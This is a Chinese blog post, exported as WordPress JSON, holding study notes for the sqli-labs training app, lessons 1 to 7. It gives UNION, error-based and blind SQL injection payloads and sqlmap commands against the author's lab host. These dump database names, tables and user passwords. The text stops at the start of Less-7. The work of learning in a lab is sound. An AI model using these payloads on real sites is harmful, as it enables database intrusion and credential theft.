{"id":125,"date":"2021-08-02T13:51:50","date_gmt":"2021-08-02T05:51:50","guid":{"rendered":"http:\/\/daishen.ltd\/?p=125"},"modified":"2021-08-02T13:51:50","modified_gmt":"2021-08-02T05:51:50","slug":"sqli-labs%e5%ad%a6%e4%b9%a0%e7%ac%94%e8%ae%b0less_1-20","status":"publish","type":"post","link":"https:\/\/daishen.ltd\/?p=125","title":{"rendered":"Sqli-labs\u5b66\u4e60\u7b14\u8bb0Less_1-20"},"content":{"rendered":"<p><meta charset=\"UTF-8\"><meta name=\"viewport\" content=\"width=device-width initial-scale=1\"><br \/>\n<title>Sqli-labs\u5b66\u4e60\u7b14\u8bb0Less_1-20<\/title><\/p>\n<h1 id=\"less-1\">Less-1<\/h1>\n<p><strong>GET &#8211; Error based &#8211; Single quotes &#8211; String(\u57fa\u4e8e\u9519\u8bef\u7684GET\u5355\u5f15\u53f7\u5b57\u7b26\u578b\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u624b\u5de5union\u8054\u5408\u67e5\u8be2\u6ce8\u5165-1\">\u65b9\u6cd5\u4e00\uff1a<strong>\u624b\u5de5UNION\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/strong><\/h3>\n<p>1.\u5224\u65ad\u662f\u5426\u80fd\u591f\u6ce8\u5165<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-1\/?id=1\n<\/code><\/pre>\n<p>2.\u5224\u65ad\u8868\u4e2d\u5b58\u5728\u51e0\u4e2a\u5b57\u6bb5<\/p>\n<pre><code>id=1' order by 3 --+\n<\/code><\/pre>\n<p>3.\u5224\u65ad\u5b57\u6bb5\u4f4d\u7f6e<\/p>\n<pre><code>id=1' and 1=2 union select 1,2,3 --+\n<\/code><\/pre>\n<p>4.\u7206\u6240\u6709\u5e93.<\/p>\n<pre><code>id=1' and 1=2 union select 1,database(),3 --+   \u67e5\u770b\u5f53\u524d\u5e93\n\nid=1' and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+   \u67e5\u770b\u6240\u6709\u5e93\n<\/code><\/pre>\n<p>5.\u7206\u6307\u5b9a\u5e93\u7684\u6240\u6709\u8868<\/p>\n<pre><code>id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+\n\u6216\u8005\nid=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>6.\u7206\u6307\u5b9a\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n<pre><code>id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+\n<\/code><\/pre>\n<p>7.\u7206\u51fa\u5b57\u6bb5\u5185\u5bb9<\/p>\n<pre><code>id=1' and 1=2 union select 1,username,password from users where id=1 --+\n\nid=1' and 1=2 union select 1,group_concat(username),group_concat(password) from security.users --+\n<\/code><\/pre>\n<h3 id=\"\u65b9\u6cd5\u4e8c\u624b\u5de5\u62a5\u9519\u578b\u6ce8\u5165\"><strong>\u65b9\u6cd5\u4e8c\uff1a\u624b\u5de5\u62a5\u9519\u578b\u6ce8\u5165<\/strong><\/h3>\n<p>\u68c0\u6d4b\u62a5\u9519\u578bpayload<\/p>\n<pre><code>?id=1' and 1=1--+   \/\/\u6b63\u786e\n?id=1' and 1=2--+   \/\/\u5931\u8d25\n**\u6ce8\u610fid=\u6b63\u786e\u503c\n<\/code><\/pre>\n<p>\u7206\u8868payload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/\/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+\n<\/code><\/pre>\n<p>\uff08\u5b57\u6bb5\uff09payload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/\/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+\n\n<\/code><\/pre>\n<p>\u7206\u503cpayload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/\/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) --+\n<\/code><\/pre>\n<p>\u663e\u7136\u6ca1\u6709\u5b8c\u5168\u663e\u793a<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/\/Less-1?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','Angelina')))) --+\n<\/code><\/pre>\n<h3 id=\"\u65b9\u6cd5\u4e09\u4f7f\u7528sqlmap\u8fdb\u884c\u81ea\u52a8\u5316\u653b\u51fb\">\u65b9\u6cd5\u4e09\uff1a\u4f7f\u7528sqlmap\u8fdb\u884c\u81ea\u52a8\u5316\u653b\u51fb<\/h3>\n<p>\u626b\u63cfURL\u76ee\u6807<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\"\n<\/code><\/pre>\n<p>\u67e5\u770b\u6240\u6709\u5e93<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" -dbs\n<\/code><\/pre>\n<p>\u67e5\u770b\u6240\u6709\u8868<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" -D security --tables\n<\/code><\/pre>\n<p>\u67e5\u770b\u8868\u5b57\u6bb5<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" -D security -T users --columns\n<\/code><\/pre>\n<p>\u67e5\u770b\u8868\u5b57\u6bb5\u5185\u5bb9<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" -D security -T users --columns -C \"username,password\" -dump\n<\/code><\/pre>\n<p>\u8fdb\u5165sql-shell<\/p>\n<pre><code> sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" --sql-shell\n<\/code><\/pre>\n<p>\u968f\u673aagent<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" --random-agent\n<\/code><\/pre>\n<p>\u591a\u7ebf\u7a0b<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" --threads=4\n<\/code><\/pre>\n<p>\u5bfc\u51faHTTP\u8be6\u7ec6\u8bf7\u6c42<\/p>\n<pre><code>sqlmap -u \"daishen.ltd:1112\/Less-1\/?id=1\" -t http.log\n<\/code><\/pre>\n<h1 id=\"less-2\">Less-2<\/h1>\n<p><strong>GET &#8211; Error based &#8211; Intiger based (\u57fa\u4e8e\u9519\u8bef\u7684GET\u6574\u578b\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u624b\u5de5union\u8054\u5408\u67e5\u8be2\u6ce8\u5165-2\">\u65b9\u6cd5\u4e00\uff1a<strong>\u624b\u5de5UNION\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/strong><\/h3>\n<p>1.\u5224\u65ad\u662f\u5426\u80fd\u591f\u6ce8\u5165<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-2\/?id=1\n<\/code><\/pre>\n<p>2.\u5224\u65ad\u8868\u4e2d\u5b58\u5728\u51e0\u4e2a\u5b57\u6bb5<\/p>\n<pre><code>id=1 order by 3 --+\n<\/code><\/pre>\n<p>3.\u5224\u65ad\u5b57\u6bb5\u4f4d\u7f6e<\/p>\n<pre><code>id=1 and 1=2 union select 1,2,3 --+\n<\/code><\/pre>\n<p>4.\u7206\u6240\u6709\u5e93.<\/p>\n<pre><code>id=1 and 1=2 union select 1,database(),3 --+   \u67e5\u770b\u5f53\u524d\u5e93\n\nid=1 and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+   \u67e5\u770b\u6240\u6709\u5e93\n<\/code><\/pre>\n<p>5.\u7206\u6307\u5b9a\u5e93\u7684\u6240\u6709\u8868<\/p>\n<pre><code>id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+\n\u6216\u8005\nid=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>6.\u7206\u6307\u5b9a\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n<pre><code>id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+\n<\/code><\/pre>\n<p>7.\u7206\u51fa\u5b57\u6bb5\u5185\u5bb9<\/p>\n<pre><code>id=1 and 1=2 union select 1,username,password from users where id=1 --+\n\nid=1 and 1=2 union select 1,group_concat(username),group_concat(password) from security.users --+\n<\/code><\/pre>\n<p>##<\/p>\n<h1 id=\"less-3\"><strong>Less-3 <\/strong><\/h1>\n<p><strong>GET &#8211; Error based &#8211; Single quotes with twist string (\u57fa\u4e8e\u9519\u8bef\u7684GET\u5355\u5f15\u53f7\u53d8\u5f62\u5b57\u7b26\u578b\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u624b\u5de5union\u8054\u5408\u67e5\u8be2\u6ce8\u5165-3\">\u65b9\u6cd5\u4e00\uff1a<strong>\u624b\u5de5UNION\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/strong><\/h3>\n<p>1.\u5224\u65ad\u662f\u5426\u80fd\u591f\u6ce8\u5165<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-3\/?id=1\n<\/code><\/pre>\n<p>2.\u5224\u65ad\u8868\u4e2d\u5b58\u5728\u51e0\u4e2a\u5b57\u6bb5<\/p>\n<pre><code>id=1') order by 3 --+\n<\/code><\/pre>\n<p>3.\u5224\u65ad\u5b57\u6bb5\u4f4d\u7f6e<\/p>\n<pre><code>id=1') and 1=2 union select 1,2,3 --+\n<\/code><\/pre>\n<p>4.\u7206\u6240\u6709\u5e93.<\/p>\n<pre><code>id=1') and 1=2 union select 1,database(),3 --+   \u67e5\u770b\u5f53\u524d\u5e93\n\nid=1') and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+   \u67e5\u770b\u6240\u6709\u5e93\n<\/code><\/pre>\n<p>5.\u7206\u6307\u5b9a\u5e93\u7684\u6240\u6709\u8868<\/p>\n<pre><code>id=1') and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+\n\u6216\u8005\nid=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>6.\u7206\u6307\u5b9a\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n<pre><code>id=1') and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+\n<\/code><\/pre>\n<p>7.\u7206\u51fa\u5b57\u6bb5\u5185\u5bb9<\/p>\n<pre><code>id=1') and 1=2 union select 1,username,password from users where id=1 --+\n\nid=1') and 1=2 union select 1,group_concat(username),group_concat(password) from security.users --+\n<\/code><\/pre>\n<h1 id=\"less-4\"><strong>Less-4 <\/strong><\/h1>\n<p><strong>GET &#8211; Error based &#8211; Double Quotes &#8211; String \uff08\u57fa\u4e8e\u9519\u8bef\u7684GET\u53cc\u5f15\u53f7\u5b57\u7b26\u578b\u6ce8\u5165\uff09<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u624b\u5de5union\u8054\u5408\u67e5\u8be2\u6ce8\u5165-4\">\u65b9\u6cd5\u4e00\uff1a<strong>\u624b\u5de5UNION\u8054\u5408\u67e5\u8be2\u6ce8\u5165<\/strong><\/h3>\n<p>1.\u5224\u65ad\u662f\u5426\u80fd\u591f\u6ce8\u5165<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-4\/?id=1\n<\/code><\/pre>\n<p>2.\u5224\u65ad\u8868\u4e2d\u5b58\u5728\u51e0\u4e2a\u5b57\u6bb5<\/p>\n<pre><code>id=1\") order by 3 --+\n<\/code><\/pre>\n<p>3.\u5224\u65ad\u5b57\u6bb5\u4f4d\u7f6e<\/p>\n<pre><code>id=1\") and 1=2 union select 1,2,3 --+\n<\/code><\/pre>\n<p>4.\u7206\u6240\u6709\u5e93.<\/p>\n<pre><code>id=1\") and 1=2 union select 1,database(),3 --+   \u67e5\u770b\u5f53\u524d\u5e93\n\nid=1\") and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+   \u67e5\u770b\u6240\u6709\u5e93\n<\/code><\/pre>\n<p>5.\u7206\u6307\u5b9a\u5e93\u7684\u6240\u6709\u8868<\/p>\n<pre><code>id=1\") and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+\n\u6216\u8005\nid=-1\") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>6.\u7206\u6307\u5b9a\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n<pre><code>id=1\") and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+\n<\/code><\/pre>\n<p>7.\u7206\u51fa\u5b57\u6bb5\u5185\u5bb9<\/p>\n<pre><code>id=1\") and 1=2 union select 1,username,password from users where id=1 --+\n\nid=1\") and 1=2 union select 1,group_concat(username),group_concat(password) from security.users --+\n<\/code><\/pre>\n<h1 id=\"less-5\"><strong>Less-5 <\/strong><\/h1>\n<p><strong>GET &#8211; Double Injection &#8211; Single Quotes &#8211; String (\u53cc\u6ce8\u5165GET\u5355\u5f15\u53f7\u5b57\u7b26\u578b\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u65f6\u95f4\u5ef6\u8fdf\u578b\u624b\u5de5\u6ce8\u5165-1\"><strong>\u65b9\u6cd5\u4e00\uff1a\u65f6\u95f4\u5ef6\u8fdf\u578b\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u65f6\u95f4\u5ef6\u8fdf\u578b\u624b\u5de5\u6ce8\u5165\uff0c\u6b63\u786e\u4f1a\u5ef6\u8fdf\uff0c\u9519\u8bef\u6ca1\u6709\u5ef6\u8fdf\u3002<\/p>\n<p>\u5224\u65ad\u8868\u4e2d\u5b58\u5728\u51e0\u4e2a\u5b57\u6bb5<\/p>\n<pre><code>id=1' order by 3 --+\n<\/code><\/pre>\n<p>\u9a8c\u8bc1\u65f6\u95f4\u5ef6\u8fdf\u578b\u7684\u76f2\u6ce8\uff1a<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/sqli-labs-master\/Less-5\/?id=1' and sleep(5)--+\n<\/code><\/pre>\n<p>\u53d1\u73b0\u660e\u663e\u5ef6\u8fdf\uff0c<\/p>\n<p>\u7206\u5e93\u957fpayload\u7ecf\u8fc7\u51e0\u6b21\u5c1d\u8bd5\uff0c\u53d1\u73b0\u6570\u636e\u5e93\u957f\u5ea6\u4e3a8\u65f6\u6709\u660e\u663e\u5ef6\u8fdf5\u79d2\u3002<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and if(length(database())=8,sleep(5),1) --+\n<\/code><\/pre>\n<p>\u7206\u5e93\u540dpayload\u6570\u636e\u5e93\u7b2c\u4e00\u4e2a\u5b57\u7b26\u4e3as\uff0c\u52a0\u4e0b\u6765\u4ee5\u6b64\u589e\u52a0left(database(),\u5b57\u7b26\u957f\u5ea6)\u4e2d\u7684\u5b57\u7b26\u957f\u5ea6\uff0c\u7b49\u53f7\u53f3\u8fb9\u4ee5\u6b64\u7206\u7834\u4e0b\u4e00\u4e2a\u5b57\u7b26\uff0c\u6b63\u786e\u5339\u914d\u65f6\u4f1a\u5ef6\u8fdf\u3002\u6700\u7ec8\u7206\u7834\u5f97\u5230left(database(),8)=&#8217;security&#8217;<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and if(left(database(),1)='s',sleep(5),1) --+\t\t\u7b2c\u4e00\u4e2a\u5b57\u6bcd\u4e3as\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1' and if(left(database(),2)='se',sleep(5),1) --+\t\u7b2c\u4e8c\u4e2a\u5b57\u6bcd\u4e3ae\n<\/code><\/pre>\n<p>\u7206\u8868\u540dpayload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+\n\n\u76f4\u63a5\u731c\n?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+\n<\/code><\/pre>\n<p>\u66b4\u6570\u636epayload\u6309\u7167id\u6392\u5e8f\uff0c\u8fd9\u6837\u4fbf\u4e8e\u5bf9\u5e94\u3002\u6ce8\u610flimit \u4ece0\u5f00\u59cb.\u575a\u6301\u4e0d\u61c8\u7684\u5c1d\u8bd5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+\n<\/code><\/pre>\n<p>\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cmysql\u5bf9\u5927\u5c0f\u5199\u4e0d\u654f\u611f\uff0c\u6240\u4ee5\u4f60\u4e0d\u77e5\u9053\u662fDumb \u8fd8\u662fdumb\u3002<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e8c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165-1\"><strong>\u65b9\u6cd5\u4e8c\uff0c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u5728\u5e03\u5c14\u578b\u6ce8\u5165\u4e2d\uff0c<strong>\u6b63\u786e\u4f1a\u56de\u663e\uff0c\u9519\u8bef\u6ca1\u6709\u56de\u663e<\/strong>\uff0c\u4ee5\u6b64\u4e3a\u4f9d\u636e\u9010\u5b57\u7206\u7834\uff0c<\/p>\n<p>\u66b4\u5e93payload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and left((select database()),1)='s' --+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1' and left((select database()),2)='se' --+\n<\/code><\/pre>\n<p>\u7206\u8868paylaod<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' --+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),2)='us' --+\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id' --+\n<\/code><\/pre>\n<p>\u7206\u5b57\u6bb5payload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1' and left((select username from users limit 0,1),1)='d' --+\n<\/code><\/pre>\n<p>\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cmysql\u5bf9\u5927\u5c0f\u5199\u4e0d\u654f\u611f\uff0c\u6240\u4ee5\u4f60\u4e0d\u77e5\u9053\u662fDumb \u8fd8\u662fdumb\u3002<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e09\u62a5\u9519\u6ce8\u5165-1\">\u65b9\u6cd5\u4e09\uff1a\u62a5\u9519\u6ce8\u5165<\/h3>\n<p>\u7206\u5e93<\/p>\n<pre><code>?id=1' and extractvalue(1,concat(0x23,database(),0x23))--+\n<\/code><\/pre>\n<p>\u7206\u8868\u540d<\/p>\n<pre><code>?id=1' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x23))--+\n\n?id=1' and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x23))--+\n<\/code><\/pre>\n<p>\u7206\u5217\u540d<\/p>\n<pre><code>?id=1' and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+\n<\/code><\/pre>\n<p>\u7206\u6570\u636e<\/p>\n<pre><code>?id=1' and extractvalue(1,concat(0x23,(select password from users order by id limit 0,1),0x23))--+\n\n?id=1' and extractvalue(1,concat(0x23,(select username from users order by id limit 2,1),0x23))--+\n<\/code><\/pre>\n<p>\u7528limit \u53ef\u4ee5\u770b\u6240\u6709\u7684\u6570\u636e\u4e86\u3002<\/p>\n<p>\u53cc\u6ce8\u5165\u67e5\u8be2\u9700\u8981\u7406\u89e3\u56db\u4e2a\u51fd\u6570\/\u8bed\u53e5<\/p>\n<ol start=\"\">\n<li>Rand() \/\/\u968f\u673a\u51fd\u6570<\/li>\n<li>Floor() \/\/\u53d6\u6574\u51fd\u6570<\/li>\n<li>Count() \/\/\u6c47\u603b\u51fd\u6570<\/li>\n<li>Group by clause \/\/\u5206\u7ec4\u8bed\u53e5<\/li>\n<\/ol>\n<h1 id=\"less-6\"><strong>Less-6<\/strong><\/h1>\n<p><strong>GET &#8211; Double Injection &#8211; Double Quotes &#8211; String (\u53cc\u6ce8\u5165GET\u53cc\u5f15\u53f7\u5b57\u7b26\u578b\u6ce8\u5165)<\/strong><\/p>\n<p>&nbsp;<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e00\u65f6\u95f4\u5ef6\u8fdf\u578b\u624b\u5de5\u6ce8\u5165-2\"><strong>\u65b9\u6cd5\u4e00\uff1a\u65f6\u95f4\u5ef6\u8fdf\u578b\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u65f6\u95f4\u5ef6\u8fdf\u578b\u624b\u5de5\u6ce8\u5165\uff0c\u6b63\u786e\u4f1a\u5ef6\u8fdf\uff0c\u9519\u8bef\u6ca1\u6709\u5ef6\u8fdf\u3002<\/p>\n<p>\u5224\u65ad\u8868\u4e2d\u5b58\u5728\u51e0\u4e2a\u5b57\u6bb5<\/p>\n<pre><code>id=1\" order by 3 --+\n<\/code><\/pre>\n<p>\u9a8c\u8bc1\u65f6\u95f4\u5ef6\u8fdf\u578b\u7684\u76f2\u6ce8\uff1a<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/sqli-labs-master\/Less-5\/?id=1\" and sleep(5)--+\n<\/code><\/pre>\n<p>\u53d1\u73b0\u660e\u663e\u5ef6\u8fdf\uff0c<\/p>\n<p>\u7206\u5e93\u957fpayload\u7ecf\u8fc7\u51e0\u6b21\u5c1d\u8bd5\uff0c\u53d1\u73b0\u6570\u636e\u5e93\u957f\u5ea6\u4e3a8\u65f6\u6709\u660e\u663e\u5ef6\u8fdf5\u79d2\u3002<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and if(length(database())=8,sleep(5),1) --+\n<\/code><\/pre>\n<p>\u7206\u5e93\u540dpayload\u6570\u636e\u5e93\u7b2c\u4e00\u4e2a\u5b57\u7b26\u4e3as\uff0c\u52a0\u4e0b\u6765\u4ee5\u6b64\u589e\u52a0left(database(),\u5b57\u7b26\u957f\u5ea6)\u4e2d\u7684\u5b57\u7b26\u957f\u5ea6\uff0c\u7b49\u53f7\u53f3\u8fb9\u4ee5\u6b64\u7206\u7834\u4e0b\u4e00\u4e2a\u5b57\u7b26\uff0c\u6b63\u786e\u5339\u914d\u65f6\u4f1a\u5ef6\u8fdf\u3002\u6700\u7ec8\u7206\u7834\u5f97\u5230left(database(),8)=&#8217;security&#8217;<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and if(left(database(),1)='s',sleep(5),1) --+\t\t\u7b2c\u4e00\u4e2a\u5b57\u6bcd\u4e3as\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and if(left(database(),2)='se',sleep(5),1) --+\t\u7b2c\u4e8c\u4e2a\u5b57\u6bcd\u4e3ae\n<\/code><\/pre>\n<p>\u7206\u8868\u540dpayload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+\n\n\u76f4\u63a5\u731c\n?id=1\" and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+\n<\/code><\/pre>\n<p>\u66b4\u6570\u636epayload\u6309\u7167id\u6392\u5e8f\uff0c\u8fd9\u6837\u4fbf\u4e8e\u5bf9\u5e94\u3002\u6ce8\u610flimit \u4ece0\u5f00\u59cb.\u575a\u6301\u4e0d\u61c8\u7684\u5c1d\u8bd5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+\n<\/code><\/pre>\n<p>\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cmysql\u5bf9\u5927\u5c0f\u5199\u4e0d\u654f\u611f\uff0c\u6240\u4ee5\u4f60\u4e0d\u77e5\u9053\u662fDumb \u8fd8\u662fdumb\u3002<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e8c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165-2\"><strong>\u65b9\u6cd5\u4e8c\uff0c\u5e03\u5c14\u578b\u624b\u5de5\u6ce8\u5165<\/strong><\/h3>\n<p>\u5728\u5e03\u5c14\u578b\u6ce8\u5165\u4e2d\uff0c<strong>\u6b63\u786e\u4f1a\u56de\u663e\uff0c\u9519\u8bef\u6ca1\u6709\u56de\u663e<\/strong>\uff0c\u4ee5\u6b64\u4e3a\u4f9d\u636e\u9010\u5b57\u7206\u7834\uff0c<\/p>\n<p>\u66b4\u5e93payload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and left((select database()),1)='s' --+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and left((select database()),2)='se' --+\n<\/code><\/pre>\n<p>\u7206\u8868paylaod<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' --+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),2)='us' --+\n<\/code><\/pre>\n<p>\u7206\u5217\u540dpayload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i' --+\n\nhttps:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and left((select column_name from information_schema.columns where table_name='users' limit 0,1),2)='id' --+\n<\/code><\/pre>\n<p>\u7206\u5b57\u6bb5payload<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-5\/?id=1\" and left((select username from users limit 0,1),1)='d' --+\n<\/code><\/pre>\n<p>\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cmysql\u5bf9\u5927\u5c0f\u5199\u4e0d\u654f\u611f\uff0c\u6240\u4ee5\u4f60\u4e0d\u77e5\u9053\u662fDumb \u8fd8\u662fdumb\u3002<\/p>\n<h3 id=\"\u65b9\u6cd5\u4e09\u62a5\u9519\u6ce8\u5165-2\">\u65b9\u6cd5\u4e09\uff1a\u62a5\u9519\u6ce8\u5165<\/h3>\n<p>\u7206\u5e93<\/p>\n<pre><code>?id=1\" and extractvalue(1,concat(0x23,database(),0x23))--+\n<\/code><\/pre>\n<p>\u7206\u8868\u540d<\/p>\n<pre><code>?id=1\" and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x23))--+\n\n?id=1\" and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x23))--+\n<\/code><\/pre>\n<p>\u7206\u5217\u540d<\/p>\n<pre><code>?id=1\" and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x23))--+\n<\/code><\/pre>\n<p>\u7206\u6570\u636e<\/p>\n<pre><code>?id=1\" and extractvalue(1,concat(0x23,(select password from users order by id limit 0,1),0x23))--+\n\n?id=1\" and extractvalue(1,concat(0x23,(select username from users order by id limit 2,1),0x23))--+\n<\/code><\/pre>\n<h1 id=\"less-7\"><strong>Less-7<\/strong><\/h1>\n<p><strong>GET &#8211; Dump into outfile &#8211; String \uff08\u5bfc\u51fa\u6587\u4ef6GET\u5b57\u7b26\u578b\u6ce8\u5165\uff09<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u5c0f\u6269\u5c55\uff1a<\/p>\n<pre><code>winserver\u7684iis\u9ed8\u8ba4\u8def\u5f84c:\\Inetpub\\wwwroot\n\nlinux\u7684nginx\u4e00\u822c\u662f\/usr\/local\/nginx\/html\uff0c\/home\/wwwroot\/default\uff0c\/usr\/share\/nginx\uff0c\/var\/www\/html\u7b49\n\napache 